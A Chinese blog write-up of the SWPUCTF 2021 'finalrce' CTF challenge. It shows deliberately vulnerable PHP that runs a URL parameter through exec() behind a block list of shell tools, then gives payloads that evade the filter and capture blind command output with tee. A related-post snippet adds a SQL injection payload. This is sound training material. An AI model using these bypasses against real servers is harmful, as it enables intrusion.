【SWPUCTF 2021 新生赛】finalrce

最新推荐文章于 2025-08-06 23:59:19 发布
原创 最新推荐文章于 2025-08-06 23:59:19 发布 · 391 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#NSSCTF #网络安全 #SWPUCTF

题目

<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

思路

通过测试,为无回显RCE,

EXP

tee命令

Linux tee命令用于读取标准输入的数据,并将其内容输出成文件。

1.取反

?url=%93%8C |tee 1.txt

2.异或

ls /   异或之后    "13@^"]@`" 
因为过滤"  所以base64编码一下
?url=IjEzQCJeIl1AYCI=|tee 1.txt

3.变形

?url=l''s /|tee 1.txt

tac命令

tac命令的功能是用于反向显示文件内容,即常见的查看文件内容命令cat的反写形式

?url=tac /flllllaaaaaaggggggg|tee 2.txt
<
最低0.47元/天 解锁文章
XiaoHei_Q
关注
[SWPUCTF 2021 新生]finalrce
2303_77293157的博客
07-16 661
因为本题没有过滤竖线|、注释符\,因此可以使用注释符进行过滤绕过,竖线进行命令拼接。tee指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。tee将想要执行的命令写入到一个文件里面,然后再去访问这个文件。tee命令用于读取标准输入的数据,并将其内容输出成文件。因为ls 和cat都被过滤了,所以都要绕过。1.打开代码后看到很多东西被过滤了;cat命令被过滤了,那直接用tac。1.利用dnslog带外。4.写文件然后访问文件。
[SWPUCTF 2021 新生]finalrce(tee)
kuzemax的博客
05-29 361
可以看到的是没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。url=l\s / | tee 1.txt 之后访问我们传入的文件1.txt,发现命令被执行。本来应该是url=ls/ 可是ls被过滤掉了,然后看别的up主说,l\s可以代替ls |是执行以下命令的意思。
精选资源
[SWPUCTF 2021 新生]web 解题思路,实操解析,解题软件,解题方法
09-06
SWPUCTF 2021新生的web项目中,参者遇到了一系列与SQL注入有关的挑战。SQL注入是一种常见的网络安全攻击方式,攻击者通过在Web表单输入或URL查询字符串中输入恶意的SQL代码,可以对数据库执行未授权的操作。...
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1754
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
NSSCTF刷题笔记web15——[SWPUCTF 2021 新生]finalrce
qq_45692883的博客
01-26 429
然后通过管道符传入到一个txt文件,我们再浏览器访问对应txt文件就可以看到数据了,因为exec在php中是无回显的执行命令函数。难道还可以用''绕过吗,如果可以,那不就有点扯了,因为如果真的有一个叫flllll''aaaaaaggggggg的文件那怎么办?那么后面的参数,要读的文件flllllaaaaaaggggggg,被过滤了la。如果真的有个叫flllll''aaaaaaggggggg怎么办,在本地试试看吧。于是就去看了看别人的wp,发现大家在ls中间加入''变成l''s可以执行命令。
[SWPUCTF 2021 新生]finalrce wp
Leaf_initial的博客
04-12 977
PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit默认1000000,超过1000000不会返回1或0而是false即超过限制即可。
[SWPUCTF 2021 新生]finalrce(管道符(|)+tee绕过exec无回显 反斜杠或者单(双)引号绕过正则表达式)
2401_84499442的博客
07-09 783
总结:当正则表达式没有过滤掉反斜杠或者单引号或者双引号(本题双引号被过滤,不再演示),那么可以使用单引号或者双引号包裹命令(ls cat等)任意一个字符,只要他们不是一个整体就行,或者使用反斜杠插入到命令里面(ca\t c\at等)即可实现绕过。由于正则表达式过滤掉了很多命令,但是注意看,反斜杠和单引号都没有被注释掉,那么我们就可以利用这一点来绕过被禁止掉的命令。得到敏感文件,再进行内容读取,由于cat和la同样被禁用,还是相同的方法。构造payload:url=l\s /|tee 1.txt;
[SWPUCTF 2021 新生]finalrce 做题记录
qq_64222098的博客
04-10 337
由于函数exec()执行完不返回结果,所以我们可以借助tee把命令写到文件里面去。通过访问文件来得到结果。虽然ls被禁了,但是我们可以用转义符或者引号来绕过。最终是在flllllaaaaaaggggggg里面找到的flag。在linux里有一个tee命令。这里贴一下菜鸟教程的解释。一般用的命令都被禁了。然后访问2.txt就可以了。然后去访问1.txt。
NSSCTF-2021年SWPU联合新生
2302_78903258的博客
07-23 1822
这里有文件上传,文件读取,还有链子,还禁用一些伪协议,就是没有禁用phar,提示已经十分明显了,虽然upload这里会进行重命名,phar是看文件内容的,改名字是没有关系的。我理解的作用就是在一些控制字符被过滤的时候,可以用转义符,让控制符失去原本的含义,变为字面量,但是作用不变。发现类似flag文件,但是直接访问的话没有内容,依旧是用tee命令输出内容,这里过滤la字符,所以我们要用。从read.php就可以知道是从aa类进入的,这里我们分析分析,可以不可以搞出来一个链子.
nssctf finalRCE
zlp185678的博客
08-06 232
shell_exec,exec,``都没有输出,所以我们需要让他显示,这里介绍一个方法,将输出写入到我们指定的文件中,然后读取文件。1.command | tee 选项 文件名 将command的输出写入到我们的文件中,选项有-a,--append,添加到文件中。c''at flag 等效于cat flag。c""at flag 等效与cat flag。c\at flag 等效与cat flag。stat / 显示目录的权限,时间。2.command >> 文件名。3.文件名 << command。
SWPUCTF 2021 新生 RCE题目
m0_74160536的博客
05-26 984
查看代码,这段 PHP 代码接受一个名为 “url” 的 GET 请求参数,然后使用 preg_match 函数对该参数进行正则匹配,检查其中是否包含一些危险的命令和特殊符号,比如 bash、nc、wget、ping、ls、cat、more、less、phpinfo、base64、echo、php、python、mv、cp、la、-、*、"、>、
swpuctf 2021 新生 error
最新发布
10-26
SWPUCTF 2021新生中,出现了以下几种错误情况: - **re2题目中flag格式与输出不符**:在re2题目里,最初拿到看似是flag的输出,提交却发现错误,原因是输出的内容格式不太像真的flag格式。由于存在结果重合情况,需列出所有情况,通过脚本处理字符编码转换来得到正确flag,如对字符串 "ylqq]aycqyp{" 进行字符编码转换,代码示例如下: ```python str2 = "ylqq]aycqyp{" str2 = list(str2) for i in range(0, len(str2)): if (ord(str2[i]) <= 120 or ord(str2[i]) > 122) and (ord(str2[i]) <= 88 or ord(str2[i]) > 90): str2[i] = chr(ord(str2[i]) + 2) else: str2[i] = chr(ord(str2[i]) - 24) flag = '' for i in range(0, len(str2)): flag += str2[i] print(flag) ``` 以及另一种代码实现方式: ```python enc = "ylqq]aycqyp{" flag = "" for i in enc: if (ord(i) <= 94 or ord(i) > 96) and (ord(i) <= 62 or ord(i) > 64): flag += chr(ord(i) + 2) else: flag += chr(ord(i) - 24) print(flag) ``` [^1] - **re1题目中ASCII值转换问题**:在re1题目中,若直接输入{34sy_r3v3rs3},计算机会对3、4进行ASCII值转换,导致与原结果不同。需要反过来输入字母,让计算机在ASCII值转换时将字母转换成所需数字,才能与正确答案匹配成功以解出题目[^2]。 - **WEB二题目中函数过滤问题**:在WEB二题目中,爆出的内容只有20位,需要使用截断函数进行绕过,但substr、right、REVERSE被过滤,只能使用mid函数进行截取,例如使用 `wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),20,20)/**/from/**/test_db.LTLT_flag%23` 进行操作[^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值